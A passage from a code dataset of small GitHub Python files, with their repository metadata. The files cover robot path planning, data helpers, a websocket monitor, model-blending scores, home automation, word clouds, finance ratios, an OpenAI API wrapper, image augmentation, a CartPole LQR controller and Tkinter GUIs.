(10,2,3,4,5)#SINR values\n for edges in self.graph:\n v2=edges[1]\n edges[3]=self.M[str(state)][v2]\n\n\n #calculate SINR penalty\n def penalty(self,location,IRSnow,SINR_Constraint):\n SINR=self.M[str(IRSnow)][location]\n if(SINR-SINR_Constraint<0):\n return abs(SINR-SINR_Constraint)\n else:\n return 0\n\n\n \n \n\n\n#==================input===============================\n# GraphSize=5\n# NumberofObstacle=0\n# AdaptionSpeed=0\n# Lambda=4\n# g = GraphRobot(GraphSize)\n# #v1,v2,sickness,SINR,edgeLength,MRC \n# g.addEdge(0, 1, 1, 2, 5, 4)\n# g.addEdge(0, 2, 4, 5, 5, 2)\n# g.addEdge(1, 2, 3, 3, 5, 3)\n# g.addEdge(1, 3, 2, 6, 5, 4)\n# g.addEdge(1, 4, 2, 2, 5, 5)\n# g.addEdge(2, 3, 3, 0.5, 5, 6)\n# #g.addEdge(3, 1, 1, 3, 5)\n# g.addEdge(3, 4, 3, 1, 5, 8)\n# g.addEdge(0, 4, 10, 8, 5, 0)\n# g.M={'0': (10,2,3,4,5),'1': (2,10,6,5,4),'2': (1,4,10,6,4),'3': (2,2,4,10,3),'4': (1,3,3,5,10)}\n# g.Obstacle=random.sample(range(1,GraphSize-1),NumberofObstacle)\n#g.RobotPathPlanning(0,4)\ntest_rho=np.zeros(5)\ntest=np.array([[1.234, 2.345, 4.543],[0.34, 12.545, -4.543]])\ntest=np.zeros((5,5))\ntest[2]=[1.234, 2.345, 4.543,0,0]\ntest[3]=[0.34, 12.545, -4.543,0,0]\n# test=2\n# print(g.M[str(test)][v2])\n#test SINR mapping\n","repo_name":"steakforlife/DP_simulation","sub_path":"RobotPathPlanning.py","file_name":"RobotPathPlanning.py","file_ext":"py","file_size_in_byte":6784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"40423422620","text":"import struct\n\nVERBOSE = False\n\ndef set_verbose(v):\n global VERBOSE\n VERBOSE = v\n\ndef hexdump_iter(data, address=0):\n for i in range(0, len(data), 16):\n row = data[i:i+16]\n hex_dump = ' '.join('%.2x' % i for i in row).ljust(3*16-1)\n char_dump = ''.join(chr(i) if 0x20 <= i <= 0x7e else '.' for i in row).ljust(16)\n yield '%.8x: %s %s' % (i + address, hex_dump, char_dump)\n\ndef hexdump(data, address=0):\n for line in hexdump_iter(data, address):\n print(line)\n\ndef ru32(fp):\n pos = fp.tell()\n data = fp.read(4)\n if VERBOSE:\n hexdump(data, pos)\n return struct.unpack('= jobs_queue.max_size:\n hold_off_user = True\n\n msg = {\n \"jobs_in_queue\": queue_size,\n 'max_queue_size': jobs_queue.max_size,\n 'hold_off_user': hold_off_user,\n }\n await websocket.send_json(msg)\n await asyncio.sleep(QUEUE_STATE_WS_REFRESH_SECONDS)\n except ConnectionClosed:\n pass\n except asyncio.CancelledError:\n await websocket.close()\n","repo_name":"golemfactory/gpu-on-golem-poc","sub_path":"api/routers/monitoring.py","file_name":"monitoring.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"67"} +{"seq_id":"17710485627","text":"import os\nimport logging\nfrom pathlib import Path\nimport pandas as pd\n\nfrom rampwf.utils import blend_submissions\n\nfrom ..model import SubmissionSimilarity\n\nfrom ._query import select_event_by_name\nfrom ._query import select_submissions_by_state\nfrom ._query import select_submission_by_id\n\nlogger = logging.getLogger(\"RAMP-DATABASE\")\n\n\ndef compute_historical_contributivity(session, event_name):\n \"\"\"Compute historical contributivities of an event using\n contributivities from blending and credits.\n\n Parameters\n ----------\n session : :class:`sqlalchemy.orm.Session`\n The session to directly perform the operation on the database.\n event_name : str\n The event associated to the submission.\n \"\"\"\n submissions = select_submissions_by_state(session, event_name, state=\"scored\")\n submissions.sort(key=lambda x: x.submission_timestamp, reverse=True)\n for s in submissions:\n s.historical_contributivity = 0.0\n for s in submissions:\n s.historical_contributivity += s.contributivity\n similarities = (\n session.query(SubmissionSimilarity)\n .filter_by(type=\"target_credit\", target_submission=s)\n .all()\n )\n if similarities:\n # if a target team enters several credits to a source submission\n # we only take the latest\n similarities.sort(key=lambda x: x.timestamp, reverse=True)\n processed_submissions = []\n historical_contributivity = s.historical_contributivity\n for ss in similarities:\n source_submission = ss.source_submission\n if source_submission not in processed_submissions:\n partial_credit = historical_contributivity * ss.similarity\n source_submission.historical_contributivity += partial_credit\n s.historical_contributivity -= partial_credit\n processed_submissions.append(source_submission)\n session.commit()\n\n\ndef compute_contributivity(\n session,\n event_name,\n ramp_kit_dir,\n ramp_data_dir,\n ramp_predictions_dir=None,\n min_improvement=0.0,\n):\n \"\"\"Blend submissions of an event, compute combined score and\n contributivities.\n\n Parameters\n ----------\n session : :class:`sqlalchemy.orm.Session`\n The session to directly perform the operation on the database.\n event_name : str\n The event associated to the submission.\n ramp_kit_dir : str\n The directory of the RAMP kit.\n ramp_data_dir : str\n The directory of the data.\n ramp_predictions_dir : str\n The directory with predictions\n min_improvement : float, default is 0.0\n The minimum improvement under which greedy blender is stopped.\n \"\"\"\n logging.basicConfig(level=logging.INFO, format=\"%(message)s\")\n logger.info(\"Combining models\")\n\n event = select_event_by_name(session, event_name)\n ramp_submission_dir = event.path_ramp_submissions\n score_type = event.get_official_score_type(session)\n\n submissions = select_submissions_by_state(session, event_name, state=\"scored\")\n if len(submissions) == 0:\n logger.info(\"No submissions to blend.\")\n return\n # ramp-board submission folder layout is different to that of\n # ramp-worklow. Here we symlink\n # submissions/submissions_/training_output\n # to predictions/sumbmission_/ if it exists, in order to avoid\n # rescoring the model.\n for sub in submissions:\n if ramp_predictions_dir is None or not Path(ramp_predictions_dir).exists():\n continue\n training_output_dir_board = Path(ramp_predictions_dir) / sub.basename\n training_output_dir_ramwf = (\n Path(ramp_submission_dir) / sub.basename / \"training_output\"\n )\n\n if (\n not training_output_dir_ramwf.exists()\n and training_output_dir_board.exists()\n ):\n # Note: on Windows 10+ this requires to enable the Developer Mode\n os.symlink(training_output_dir_board.resolve(), training_output_dir_ramwf)\n\n blend_submissions(\n submissions=[sub.basename for sub in submissions],\n ramp_kit_dir=ramp_kit_dir,\n ramp_data_dir=ramp_data_dir,\n ramp_submission_dir=ramp_submission_dir,\n save_output=True,\n min_improvement=min_improvement,\n )\n\n bsc_f_name = \"bagged_scores_combined.csv\"\n bsc_df = pd.read_csv(\n os.path.join(ramp_submission_dir, \"training_output\", bsc_f_name)\n )\n n_folds = len(bsc_df) // 2\n\n row = (bsc_df[\"step\"] == \"valid\") & (bsc_df[\"n_bag\"] == n_folds - 1)\n event.combined_combined_valid_score = bsc_df[row][score_type.name].values[0]\n row = (bsc_df[\"step\"] == \"test\") & (bsc_df[\"n_bag\"] == n_folds - 1)\n event.combined_combined_test_score = bsc_df[row][score_type.name].values[0]\n\n bsfb_f_name = \"bagged_scores_foldwise_best.csv\"\n bsfb_df = pd.read_csv(\n os.path.join(ramp_submission_dir, \"training_output\", bsfb_f_name)\n )\n row = (bsfb_df[\"step\"] == \"valid\") & (bsfb_df[\"n_bag\"] == n_folds - 1)\n event.combined_foldwise_valid_score = bsfb_df[row][score_type.name].values[0]\n row = (bsfb_df[\"step\"] == \"test\") & (bsfb_df[\"n_bag\"] == n_folds - 1)\n event.combined_foldwise_test_score = bsfb_df[row][score_type.name].values[0]\n\n c_f_name = \"contributivities.csv\"\n contributivities_df = pd.read_csv(\n os.path.join(ramp_submission_dir, \"training_output\", c_f_name)\n )\n\n logger.info(contributivities_df)\n for index, row in contributivities_df.iterrows():\n sub_id = int(row[\"submission\"][-9:])\n submission = select_submission_by_id(session, sub_id)\n submission.contributivity = 0.0\n for fold_i in range(n_folds):\n c_i = row[\"fold_{}\".format(fold_i)]\n submission.contributivity += c_i\n\n session.commit()\n","repo_name":"paris-saclay-cds/ramp-board","sub_path":"ramp-database/ramp_database/tools/contributivity.py","file_name":"contributivity.py","file_ext":"py","file_size_in_byte":5883,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"67"} +{"seq_id":"73521993812","text":"import sys\n\nn, m, s, d = map(int, sys.stdin.readline().split())\nslots = list(enumerate(map(int, sys.stdin.readline().split())))\nslots.sort(key=lambda x: -x[1])\nrefill = {}\nwhile n > 0:\n i, c = slots.pop()\n refill[i] = min(d - c, n)\n n -= refill[i]\nremaining = sum(c for i, c in slots)\nif remaining < m:\n print('impossible')\nelse:\n print(' '.join(str(refill.get(i, 0)) for i in range(s)))\n","repo_name":"kscharlund/kattis","sub_path":"keepitcool/keepitcool.py","file_name":"keepitcool.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"34786384910","text":"import appdaemon.plugins.hass.hassapi as hass\n\n\n# Adjusts the ecobee thermostat according to state\n\nclass Climate(hass.Hass):\n\n def initialize(self):\n self.disabled_modes = [\n item.casefold() for item in self.args['disabled_modes']\n ]\n if 'windows_entity' in self.args:\n self.windows_entity = self.args['windows_entity']\n else:\n self.windows_entity = None\n\n self.climate_entity = self.args['climate_entity']\n\n # react to all windows closing\n if self.windows_entity is not None:\n self.listen_state(self.windows_closed, self.windows_entity, new='off')\n\n # react to a window opening\n if self.windows_entity is not None:\n self.listen_state(self.window_open, self.windows_entity, new='on')\n\n @property\n def allowed_mode(self):\n\n # is the automation mode in an allowed state?\n if 'away' in self.disabled_modes:\n if self.home_occupancy == 'off':\n self.log(\n 'automation declined for occupancy - ' +\n self.current_state\n )\n return False\n if 'guest' in self.disabled_modes:\n if self.guest_mode == 'on':\n self.log(\n 'automation declined for guest mode - ' +\n self.current_state\n )\n return False\n if 'quiet' in self.disabled_modes:\n if self.quiet_mode == 'on':\n self.log(\n 'automation declined for quiet mode - ' +\n self.current_state\n )\n return False\n\n return True\n\n @property\n def current_state(self):\n\n return (\n 'current_state('\n 'home_occupancy=%s, '\n 'guest_mode=%s, '\n 'moonlight=%s, '\n 'night_mode=%s, '\n 'quiet_mode=%s, '\n 'windows_state=%s'\n ')'\n %\n (\n self.home_occupancy,\n self.guest_mode,\n self.moonlight,\n self.night_mode,\n self.quiet_mode,\n self.windows_state\n )\n )\n\n @property\n def home_occupancy(self):\n return self.get_state('input_boolean.home_occupancy')\n\n @property\n def guest_mode(self):\n return self.get_state('input_boolean.guest_mode')\n\n @property\n def moonlight(self):\n return self.get_state('input_boolean.moonlight')\n\n @property\n def night_mode(self):\n return self.get_state('input_boolean.night_mode')\n\n @property\n def quiet_mode(self):\n return self.get_state('input_boolean.quiet_mode')\n\n @property\n def windows_state(self):\n return self.get_state(self.windows_entity)\n\n def windows_closed(self, entity, attribute, old, new, kwargs):\n\n # all the windows have closed - turn the climate control on\n self.call_service(\n 'climate/set_operation_mode',\n entity_id='climate.home',\n operation_mode='auto'\n )\n self.log(\n 'all windows are closed, climate control set to auto - ' +\n self.current_state\n )\n\n def window_open(self, entity, attribute, old, new, kwargs):\n\n # a window is open - turn the climate control off\n self.call_service(\n 'climate/set_operation_mode',\n entity_id='climate.home',\n operation_mode='off'\n )\n self.log(\n 'a windows is open - climate control turned off - ' +\n self.current_state\n )","repo_name":"aenea/appdaemon-config","sub_path":"climate.py","file_name":"climate.py","file_ext":"py","file_size_in_byte":3657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"1936772170","text":"from os import sep, write\nfrom konlpy.tag import Okt\nfrom collections import Counter\nfrom PIL import Image\nfrom wordcloud import WordCloud\nimport numpy as np\nimport json\nok_twitter = Okt()\n\ndef createWordCloud(json_file, fileName):\n text = \"\"\n words_cnt = 0\n for writer, dic in json_file.items():\n words = dic[\"morph\"]\n if len(words) > 0:\n count = np.array(list(Counter(words).items()))\n count_value = np.array(count[:, 1], dtype=np.int32)\n word_cnt = len(count_value[count_value > 1])\n print(word_cnt, end=\" \")\n words_cnt += word_cnt\n if word_cnt > 0:\n for word in words:\n text += word + \" \"\n print(words_cnt, text)\n #워드 클라우드 생성\n mask_image = np.array(Image.open(path + 'data/mask.png'))\n wc = WordCloud(\n font_path='C:/Windows/Fonts/NanumGothic.ttf', # 사용할 폰트\n background_color='white', # 배경색\n max_words=250, # 최대 빈도수를 기준으로 출력할 단어 수\n mask=mask_image, # 마스크 이미지\n max_font_size=100, # 최대 폰트 크기\n colormap='hsv' # 컬러 스타일 ex)'Accent', 'Accent_r', 'Blues', 'Blues_r' 등등\n ).generate(text)\n wc.to_file(path + fileName + '.png')\n\npath = \"./물금고등학교-익명의-숲_생활편/\"\n\nwith open(path + \"morphs_before.json\", \"r\", encoding='UTF-8') as j:\n json_file = json.load(j)\n\ncreateWordCloud(json_file, \"before\")\n\nwith open(path + \"morphs_before.json\", \"r\", encoding='UTF-8') as j:\n json_file = json.load(j)\n \ncreateWordCloud(json_file, \"after\")","repo_name":"heoshin/exhibition","sub_path":"old_code/2_6. WordCloud.py","file_name":"2_6. WordCloud.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"32141759974","text":"#! /usr/bin/python3\n# -*- codeing = utf-8 -*-\n'''\n@Time : 2023/1/2 12:09\n@Author : Jocx-H\n@File : detailService.py\n@Desc : PyCharm\n'''\n\nimport json\nimport random\nimport traceback\n\nfrom typing import Dict\nfrom dao import infoDao\n\n\ndef __detail__(movie_id):\n try:\n movie_info = infoDao.getMovieDetails(movie_id)\n except Exception as e:\n print(repr(e))\n traceback.print_exc()\n raise e\n return movie_info\n\n\ndef getMovieDetail(movie_id) -> Dict:\n return {'result': __detail__(movie_id)}\n\n\nif __name__ == '__main__':\n res = getMovieDetail(100)\n print(res)","repo_name":"Jocx-H/MovieRecommoned","sub_path":"back/Service/detailService.py","file_name":"detailService.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"28898429521","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Aug 26 23:02:25 2018\n\n@author: bas\n\"\"\"\n\ndef sortino_ratio(Y = []):\n '''\n Sortino Ratio is a measure of how much extra return an asset generates per unit of downside volatilty.\n The extra return is normally determined by the differnece between the avg return of an asset and the avg return of a risk-free asset (e.g. treasury bonds)\n '''\n \n #Current Sortino Ratio calculation is based on Red Rock CME group. \n \n #Daily Return\n Return = (Y.pct_change()).tolist() #pct_change in decimal form\n Avg_Return = sum(Return[1:])/len(Return)\n \n #Risk-Free return (for assigned period)\n #Daily = ((2.5/100 + 1)**(1/365) - 1)*100\n \n \n #Downside Standard Deviation\n N_Returns_Sqrt = [(i**2) if i < 0.0 else 0.0 for i in Return]\n Down_Dev = (sum(N_Returns_Sqrt)/(len(N_Returns_Sqrt)))**(1/2)\n \n \n #Sortino Ratio\n Sortino_Ratio = (Avg_Return)/Down_Dev\n \n return Sortino_Ratio\n\n","repo_name":"stapiastocker/Trading-Algo","sub_path":"Strategy/SortinoRatio.py","file_name":"SortinoRatio.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"14591559752","text":"import time\n\nimport openai\n\nfrom config import SLEEP_SECONDS_AFTER_CALL\n\n\nclass ChatGPTWrapper:\n \"\"\"\n Wrapper class for ChatGPT APIs\n \"\"\"\n\n @staticmethod\n def init(api_key):\n openai.api_key = api_key\n\n @staticmethod\n def ask(prompt, role=None, max_tokens=None):\n message = [{\"role\": \"user\", \"content\": prompt}]\n if role:\n message.append(\n {\n \"role\": \"system\",\n \"content\": role,\n }\n )\n completion = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=message,\n max_tokens=max_tokens,\n )\n\n time.sleep(SLEEP_SECONDS_AFTER_CALL) # To make OpenAI rate limiter happy\n\n return completion[\"choices\"][0][\"message\"][\"content\"].strip()\n\n @staticmethod\n def ask_as_researcher(prompt, paper_content, max_tokens=None):\n role_message = (\n \"You will answer this question as this research paper itself. \"\n + paper_content\n )\n return ChatGPTWrapper.ask(\n prompt=prompt, role=role_message, max_tokens=max_tokens\n )\n","repo_name":"ruogudu/PaperGPT","sub_path":"chatgpt_wrapper.py","file_name":"chatgpt_wrapper.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"67"} +{"seq_id":"3165650113","text":"import os\r\nimport cv2\r\nimport albumentations as A\r\nimport time # Import the time module\r\n\r\ndef augment_images_in_subfolders(root_folder, num_augmentations):\r\n # Record the start time\r\n total_start_time = time.time()\r\n\r\n # Define augmentation transformations\r\n transform_flip = A.HorizontalFlip(p=1)\r\n transform_light = A.RandomBrightnessContrast(p=1)\r\n transform_rotate_left = A.ShiftScaleRotate(rotate_limit=20, shift_limit=0.0625, p=1)\r\n transform_rotate_right = A.ShiftScaleRotate(rotate_limit=-20, p=1)\r\n\r\n # Initialize a variable to store the total execution time\r\n total_execution_time = 0.0\r\n\r\n # Iterate through subfolders in the root folder\r\n for subfolder in os.listdir(root_folder):\r\n subfolder_path = os.path.join(root_folder, subfolder)\r\n\r\n # Check if the item in the main folder is a directory\r\n if os.path.isdir(subfolder_path):\r\n print(f\"Augmenting images in folder: {subfolder}\")\r\n\r\n # Record the start time for the current subfolder\r\n start_time = time.time()\r\n\r\n # Iterate through image files in the subfolder\r\n for file in os.listdir(subfolder_path):\r\n try:\r\n file_path = os.path.join(subfolder_path, file)\r\n image = cv2.imread(file_path)\r\n\r\n if image is None:\r\n raise Exception(\"Invalid Image\")\r\n\r\n # Apply augmentations based on the 'num' parameter\r\n augmented_images = []\r\n\r\n if num_augmentations >= 2:\r\n augmented_images.append(transform_flip(image=image)[\"image\"])\r\n augmented_images.append(transform_light(image=image)[\"image\"])\r\n\r\n if num_augmentations == 4:\r\n augmented_images.append(transform_rotate_left(image=image)[\"image\"])\r\n augmented_images.append(transform_rotate_right(image=image)[\"image\"])\r\n\r\n file_name, file_ext = os.path.splitext(file)\r\n\r\n # Save augmented images\r\n for idx, augmented_image in enumerate(augmented_images):\r\n augmented_file_name = f\"{file_name}_aug{idx + 1}{file_ext}\"\r\n augmented_file_path = os.path.join(subfolder_path, augmented_file_name)\r\n cv2.imwrite(augmented_file_path, cv2.cvtColor(augmented_image, cv2.COLOR_BGR2RGB))\r\n\r\n except Exception as e:\r\n print(f\"Error processing {file}: {e}\")\r\n # Handle the error or move the problematic file here if needed\r\n continue\r\n\r\n # Record the end time for the current subfolder\r\n end_time = time.time()\r\n\r\n # Calculate the execution time for the current subfolder\r\n execution_time = end_time - start_time\r\n\r\n # Add the execution time of the current subfolder to the total execution time\r\n total_execution_time += execution_time\r\n\r\n # Record the end time for all subfolders\r\n total_end_time = time.time()\r\n\r\n # Calculate the total execution time for all subfolders\r\n total_execution_time = total_end_time - total_start_time\r\n\r\n # Print the total execution time\r\n print(f\"Total time for processing all subfolders: {total_execution_time:.2f} seconds\")\r\n\r\n\r\n\r\n# Example usage:\r\nroot_folder = \"Dataset\" # Replace 'MainFolder' with the path to your main directory\r\nnum_augmentations = 8 # You can change this to 2 if needed\r\naugment_images_in_subfolders(root_folder, num_augmentations)\r\n","repo_name":"NitinBhore/face_recognition","sub_path":"data_augmentation.py","file_name":"data_augmentation.py","file_ext":"py","file_size_in_byte":3642,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"42094466907","text":"import math\r\na = float(input('Введите первое число:'))\r\nb = float(input('Введите второе число:'))\r\namin = math.ceil(min(a, b)) # Ставим округление к большему на случай если пользователь введет диапазон 4.3 5.2\r\nbmax = int(max(a, b))\r\nc = list(range(amin -1, bmax + 1)) # Так как range() срезает последнее число +1, так как итератор + 1 то берем для нашего исчесление последнее число -1\r\nfor i in c:\r\n i += 1\r\n if i < 1: # Отсекаем числа меньше ноля.\r\n continue\r\n elif i > bmax: # Если превышает bmax то цикл обрывается\r\n break\r\n else:\r\n print(i)\r\nelse:\r\n print('else')\r\n","repo_name":"Pasha-lt/ITEA","sub_path":"lesson02/hw_2_2way2.py","file_name":"hw_2_2way2.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33135169046","text":"import webbrowser\r\nfrom tkinter import *\r\n\r\n\r\nclass ContentWindow:\r\n\r\n def __init__(self, value):\r\n\r\n self.WIDTH = 250\r\n self.HEIGHT = 250\r\n\r\n self.value = value\r\n\r\n self.master = Tk()\r\n self.master.title('Brief')\r\n self.master.lift()\r\n self.master.attributes('-topmost', True)\r\n self.master.geometry('1008x600+230+130')\r\n self.master.resizable(0, 0)\r\n\r\n # The button to view the original article\r\n Button(self.master, text='Click Here', font='corbel 10', relief=FLAT, command=self.original_article)\\\r\n .place(x=900, y=575)\r\n Label(self.master, text='To view ful article ', font='corbel 10', relief=FLAT).place(x=750, y=575)\r\n\r\n # A frame to hold the text box that contains the\r\n # description about the news\r\n\r\n self.description_frame = LabelFrame(self.master, text='Description', width=1006, height=575 - self.HEIGHT,\r\n bg='light green', font='corbel 12 bold')\r\n self.description_frame.place(x=0, y=0)\r\n\r\n # the text box in description\r\n self.desc_text_box = Text(self.description_frame, width=123, height=11, relief=SUNKEN, bd=2, wrap=WORD, font='corbel 12')\r\n self.desc_text_box.place(x=3, y=3)\r\n\r\n # The content frame to display the main news content\r\n self.content_frame = LabelFrame(self.master, text='Content', width=1006, height=575 - self.HEIGHT,\r\n bg='light blue', font='corbel 12 bold')\r\n self.content_frame.place(x=0, y=self.HEIGHT)\r\n\r\n # The text box in content_frame\r\n self.cont_text_box = Text(self.content_frame, width=123, height=15, relief=SUNKEN, bd=2, wrap=WORD, font='corbel 12')\r\n self.cont_text_box.place(x=3, y=3)\r\n\r\n # function call\r\n self.fill_info()\r\n self.master.mainloop()\r\n\r\n def fill_info(self):\r\n\r\n # Fill the description box\r\n self.desc_text_box.delete(0.0, END)\r\n self.desc_text_box.insert(0.0, self.value[1])\r\n\r\n # fill the content box\r\n # Have to beautify\r\n self.cont_text_box.delete(0.0, END)\r\n self.cont_text_box.insert(0.0, self.value[2])\r\n\r\n def original_article(self):\r\n self.master.withdraw()\r\n self.master.quit()\r\n self.master.destroy()\r\n url = self.value[3]\r\n webbrowser.open(url)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n a = ('Apple puts restrictions on coronavirus-themed apps in its App Store', 'Apple is closely evaluating apps with coronavirus focus. It says only “recognized entities such as government organizations, health-focused NGOs, companies deeply credentialed in health issues, and medical or educational institutions,” should submit such apps…', 'The company says coronavirus-themed games will not be allowed\\r\\nIllustration by Alex Castro / The Verge\\r\\nIn an effort to ensure the credibility of health and safety information in its App Store, Apple is tightening requirements for all coronavirus-focused apps… [+1028 chars]', 'https://www.theverge.com/2020/3/14/21179993/apple-restrictions-coronavirus-app-store', 'https://cdn.vox-cdn.com/thumbor/OrCEcxQRSQP5T2C0miJ8ruYHs0E=/0x146:2040x1214/fit-in/1200x630/cdn.vox-cdn.com/uploads/chorus_asset/file/11477049/acastro_180604_1777_apple_wwdc_0002.jpg')\r\n\r\n test = ContentWindow(a)","repo_name":"Adwaith-Rajesh/NEWS","sub_path":"windows/content_window.py","file_name":"content_window.py","file_ext":"py","file_size_in_byte":3380,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"20516336004","text":"from floodsystem.geo import stations_by_distance\nfrom floodsystem.stationdata import build_station_list\n\n# Task 1B\ndef task1B():\n lst = stations_by_distance(build_station_list(),(52.2053,0.1218))\n station = build_station_list()\n lst_closest = []\n lst_furthest = []\n\n closest = lst[:10]\n furthest = lst[-10:]\n\n for i in closest:\n lst_closest.append((i[0].name, i[0].town, i[1]))\n for j in furthest:\n lst_furthest.append((j[0].name, j[0].town, j[1]))\n\n print(f\"\\nTask1B:\\nClosest 10 stations: {lst_closest}\")\n print(f\"Furthest 10 stations: {lst_furthest}\")\n\ntask1B()\n\n","repo_name":"Matthew-Dixon/IA-Computing-Flood-system","sub_path":"Task1B.py","file_name":"Task1B.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43700361942","text":"import gymnasium as gym\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom scipy import linalg\nfrom get_dynamics import get_k\nfrom controller import apply_state_controller\n\nenv = gym.make('CartPole-v1', render_mode='human')\nobs = env.reset()\n\nm_cart = env.masscart\nm_bob = env.masspole\ngravity = env.gravity\nl = env.length\n\nK = get_k(m_cart, m_bob, gravity, l)\n\nK_new = np.array(K[0])\n\nobs = np.array(obs[0])\n\nfor _ in range(1000):\n env.render()\n\n action, force = apply_state_controller(K, obs)\n\n abs_force = abs(float(np.clip(force, -10, 10)))\n\n env.env.force_mag = abs_force\n\n obs, reward, done, truncated, info = env.step(action)\n if done:\n print(f'Terminated after {i + 1} iterations.')\n break\n\nenv.close()\n","repo_name":"gupta-anmol99/LQR","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36580644693","text":"import urllib\nimport urllib.request\n\nfrom PIL import Image, ImageDraw, ImageFont, ImageFilter, ImageOps\n\n\nclass TextDraw(ImageDraw.ImageDraw):\n def align_text(self, text, x0, y0, x1, y1, font_path, ha='centre', va='centre', **kwargs):\n draw_args = (\n 'font', 'spacing', 'direction', 'features', \n 'language', 'stroke_width'\n )\n draw_dict = dict()\n for d in draw_args:\n if d in kwargs.keys():\n draw_dict[d] = kwargs[d]\n \n size = self.maximise_text_size(\n text=text, max_w=x1-x0, max_h=y1-y0, font=font_path\n )\n font = ImageFont.truetype(font=font_path, size=size)\n \n w, h = self.textsize(text, font=font, **draw_dict)\n \n if ha == 'left':\n x = x0\n elif ha == 'right':\n x = x1 - w\n elif ha == 'centre':\n x = (x0 + x1 - w) / 2\n else:\n print(h, 'OH NO')\n \n if va == 'top':\n y = y0\n elif va == 'bottom':\n y = y1 - h\n elif va == 'centre':\n y = (y0 + y1 - h) / 2\n else:\n print(v, 'OH NO')\n \n self.text(xy=(x, y), text=text, font=font, **kwargs)\n \n # DEBUG - draw rectangle used by text\n # self.rectangle(xy=[x, y, x+w, y+h])\n \n def maximise_text_size(self, text, max_w, max_h, **kwargs):\n def fits(size):\n local_dict = {k: v for k, v in kwargs.items()}\n font = ImageFont.truetype(local_dict.pop('font'), size=size)\n w, h = self.textsize(text, font=font, **local_dict)\n \n return w <= max_w and h <= max_h\n \n upper = max_h\n while fits(upper):\n upper *= 2\n \n lower = int(upper / 2)\n while not fits(lower):\n lower = int(lower / 2)\n \n while (upper - lower) > 1:\n mid = int((upper + lower) / 2)\n if fits(mid):\n lower = mid\n else:\n upper = mid\n \n return lower\n \n \ndef scale_from_url(url, x0, y0, x1, y1, blur_size=3):\n w = x1 - x0\n h = y1 - y0\n\n img = Image.open(urllib.request.urlopen(url)).convert('RGBA')\n \n if blur_size:\n img = ImageOps.expand(img, border=blur_size*10, fill=(0,0,0,0))\n blur = img.filter(ImageFilter.GaussianBlur(radius=blur_size))\n blur.paste(img, mask=img)\n img = blur\n \n img = img.crop(img.getbbox())\n \n img_w, img_h = img.size\n\n if img_w >= img_h:\n new_w = w\n new_h = int(img_h * new_w / img_w)\n else:\n new_h = h\n new_w = int(img_w * new_h / img_h)\n\n scaled = img.resize((new_w, new_h), resample=Image.ANTIALIAS)\n\n new_x0 = x0 + int((w-new_w)/2)\n new_y0 = y0 +int((h-new_h)/2)\n\n return scaled, new_x0, new_y0\n","repo_name":"asongtoruin/fixture_bot","sub_path":"images.py","file_name":"images.py","file_ext":"py","file_size_in_byte":2894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"75024367911","text":"from Box_Dialog import *\nfrom Box_Input import *\nfrom Cbox_Prompt import *\nfrom Menu_mode import *\nfrom Cbox_Model import *\nfrom Button_Load import *\nfrom scripts.add_chat import *\nfrom scripts.check_format import *\nfrom scripts.is_prompt_changed import *\nfrom ask_GPT import *\n# 提交用户输入设置的参数\ndef submit_user_parameter():\n # 将用户输入的文本提交到对话框\n user_content = Input_box.get(\"1.0\", \"end\")\n Input_box.delete(\"1.0\", \"end\")\n Dialog_box.config(state=tk.NORMAL)\n Dialog_box.insert(tk.END, \"\\nUser:\\n\" + user_content + \"\\n\")\n Dialog_box.config(state=tk.DISABLED)\n Dialog_box.see(tk.END)\n Dialog_box.update()\n # 获取用户输入的参数\n try:\n temperature = float(temperature_box.get())\n except:\n # 如果用户没有输入温度,就默认为0.6\n temperature = 0.6\n try:\n max_token = int(max_tokens_box.get())\n except:\n # 如果用户没有输入最大标记数,就默认为50\n max_token = 50\n return user_content, temperature, max_token, \\\n selected_model.get(), selected_prompt_title.get(),selected_mode.get()\n\n# 检查格式并发送\ndef check_and_sendGPT(text, temperature, max_token, selected_model, selected_prompt,\n selected_mode\n ):\n # 检查对话记录格式\n chat_history_format, history = check_format(chat_history)\n # 检查对话记录与模型是否匹配\n if model_in_mode[selected_model] == chat_history_format:\n #功能模式\n if selected_mode == mode_dict[0]:\n # 检查期间是否更改了功能\n if is_prompt_changed(chat_history, chat_history_format, prompts[selected_prompt]):\n add_chat(prompts[selected_prompt], chat_history, chat_history_format, \"system\")\n\n # 添加用户输入\n if chat_history_format == format_list[0]:\n add_chat(text, chat_history, model_in_mode[selected_model], \"user\")\n elif chat_history_format == format_list[1]:\n 